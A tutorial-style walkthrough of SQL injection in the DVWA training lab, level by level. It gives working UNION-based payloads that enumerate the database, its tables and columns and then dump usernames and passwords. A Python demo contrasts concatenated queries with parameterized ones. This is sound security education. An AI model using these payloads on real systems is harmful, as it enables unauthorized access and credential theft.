SQL Injection
For the lab environment used in this article, see: DVWA environment construction
SQL injection means inserting SQL statements into a web form submission or the query string of a page request, so that the server is tricked into executing malicious SQL commands.
General flow of SQL injection:
1. Determine the injection point
2. Determine the injection type
3. Determine the database type
4. Obtain database permissions and escalate privileges
Low Level
Let us first analyze the source code, then go through the operations to verify our analysis.
Key parts of the source code:
As we can see, there is an obvious injection vulnerability: the query parameter id is not filtered at all.
1. First we try to determine the injection point
You can enter a single quotation mark and see whether an error is returned.
Injection is possible.
At the same time we see that the id parameter is wrapped in quotation marks, '$id', which indicates character-type injection.
2. How to judge character-type injection
Test method, for example:
http://127.0.0.1/test/test2.php?user=admin' and '1'='1  returns success
http://127.0.0.1/test/test2.php?user=admin' and '1'='2  returns an error
When we enter 1' and '1'='1, the statement becomes: select * from user where user = '1' and '1'='1'
At this point the left side of the AND holds, and on the right side the two characters '1' are also equal, so the condition holds and the whole query statement succeeds.
When '1'='1 is changed to '1'='2, the whole query statement returns an error.
The technique used here is to close the single quote in the original query statement with a single quote of our own, so that the statement we guessed at is executed and produces the result we want.
Of course, the judgment statement is not limited to these; for example, changing '1'='1 to 'a'='a has the same effect.
- Test at the Low level: enter 1' and '1'='1, the query succeeds
- Enter 1' and '1'='2, the query fails
3. Once the above judgment has been made, we can start extracting data through the query.
(1) Determine the number of columns
- Enter 1' ORDER BY 3 #  (query fails)
- Enter 1' ORDER BY 2 #  (query succeeds)
- Note: the # sign is added here for its commenting effect. When we enter this query statement, it becomes: SELECT first_name, last_name FROM users WHERE user_id = '1' ORDER BY 2 #'
We can see that the extra single quotation mark is dropped by the # comment.
(2) Determine the database currently in use
- Enter 1' union select 1,database() #
The database currently in use is dvwa.
(3) Determine the tables in the database
- Enter 1' union select 1,table_name from information_schema.tables where table_schema='dvwa' #
Two tables are stored in the dvwa database.
(4) Determine the columns in the users table
- Enter 1' union select 1,column_name from information_schema.columns where table_name='users' #
Many columns are returned; next we dump the contents of the user and password columns.
(5) Dump the contents of the user and password columns
- Enter 1' union select user,password from users #
The user names and passwords in this database were successfully dumped.
Medium level
Take a look at the key code.
- The mysql_real_escape_string() function escapes special characters in strings used in SQL statements.
The following characters are affected:
- \x00
- \n
- \r
- \
- '
- "
- \x1a
This function restricts user input to a certain extent. However, in this query statement the id parameter is read without quotation marks around it; this differs from the Low level and is numeric injection. When this kind of injection is encountered, the function above has no effect, because our injected input does not need to contain any of those special characters.
1. How to judge that it is numeric injection
Test method, for example:
http://127.0.0.1/test/test.php?id=1 and 1=1  returns success
http://127.0.0.1/test/test.php?id=1 and 1=2  returns an error
When we perform SQL injection, the server executes a query against the database; in the case of numeric injection the query is generally of the form select * from user where id=$id
The $id here is submitted by GET or POST (the common submission methods); here GET is used (you can tell because the submitted value is displayed in the URL).
When we enter the judgment statement and 1=1, the query statement becomes: select * from user where id=1 and 1=1
At this point the left side of the AND holds and the right side 1=1 also holds. We know that with AND both sides must be true for the result to be true. According to our judgment statement both sides are true, so the whole SELECT query succeeds.
Of course, if we enter 1=2, it is false, so the whole condition does not hold and an error is returned.
Now let us test it in the experimental environment:
- Enter 1 and 1=1:
Because this is a drop-down box, we can inject by inspecting the element and modifying its value, or by capturing the request with BP and changing the parameter in the packet. Here I had a small problem with my Java environment that was not fixed in time, so BP is not used; you do not need BP either. Submit.
The query succeeds.
- Change the value to 1 and 1=2. Submit.
The query fails. This proves it is numeric injection.
The following steps are almost the same as at the Low level, except that the single quote and the # sign are removed. Very simple:
- Number of columns: 1 order by 2
- Current database: 1 union select 1,database()
- Tables in the database: 1 union select 1,table_name from information_schema.tables where table_schema='dvwa'
- Columns in the users table: 1 union select 1,column_name from information_schema.columns where table_name='users'
- Dump column contents: 1 union select user,password from users
High level
View the key code.
This is about the same as the Low level. LIMIT 1 is added after the query statement, meaning only the first record found is returned.
From the experiments above we know that our query returns many results, and the first record is the normal one. This would stop us from seeing the malicious query results that follow it.
In fact, adding LIMIT 1 here makes no difference, because the id parameter is character type. Just as at the Low level we commented out the trailing single quote, the LIMIT 1 added here can be commented out in the same way. It is completely useless.
For example, with the input 1' and 1=1 # the query statement becomes:
SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1 #' LIMIT 1
Once the # sign comments out the rest, the query condition holds.
- Let us test it in the experimental environment.
- All the records are found.
This confirms that our analysis is correct. Next comes the same routine: count the columns, find the database, list the tables, list the columns, dump the contents. Not repeated here one by one.
Impossible level
View the key source.
The code limits the number of query results that are output, preventing large amounts of data from leaking. PDO is used to separate code from data, so that user input is no longer executed as code. This achieves the goal of eliminating SQL injection. Invincible!
I also know very little about PDO, and will add to this once I have mastered it.
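To make the three behaviours discussed above concrete (the character-type concatenation at the Low level, the escaped-but-unquoted numeric context at the Medium level, and the code/data separation that PDO prepared statements give at the Impossible level), here is an added Python/sqlite3 example that is not DVWA's own PHP code. The users table, the rows in it and the escape() helper are constructed stand-ins, and the page's own probe inputs are run through each query style.

```python
import sqlite3

# Constructed stand-in for DVWA's users table (sqlite3, not DVWA's MySQL schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")])
    return conn

DB = make_db()

def escape(s):
    # Simplified stand-in for mysql_real_escape_string in SQLite dialect:
    # it only neutralises quote characters and does nothing to input that has none.
    return s.replace("'", "''")

def low_level(user_id):
    # Low: input is concatenated inside single quotes with no filtering,
    # so a quote in the input closes the string and the rest is parsed as SQL.
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return DB.execute(sql).fetchall()

def medium_level(user_id):
    # Medium: input is escaped but used unquoted (numeric context), so
    # "1 and 1=1" contains nothing to escape and still reaches the parser as SQL.
    # (Input containing a quote is mangled by escape() and fails to parse.)
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = {escape(user_id)}"
    return DB.execute(sql).fetchall()

def impossible_level(user_id):
    # Impossible: the statement text is fixed and the value is bound as a
    # parameter, so the whole input is compared as data and never parsed as SQL.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return DB.execute(sql, (user_id,)).fetchall()

if __name__ == "__main__":
    for probe in ("1", "1' and '1'='1", "1' and '1'='2"):
        print("low       ", repr(probe), low_level(probe))
    for probe in ("1", "1 and 1=1", "1 and 1=2"):
        print("medium    ", repr(probe), medium_level(probe))
    for probe in ("1", "1' and '1'='1", "1 and 1=1"):
        print("impossible", repr(probe), impossible_level(probe))
```

Note that the injected probes succeed or fail exactly as the article describes against the first two query styles, while the bound-parameter version returns the admin row only for the plain value "1" and nothing for either probe.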
SQL injection of DVWA article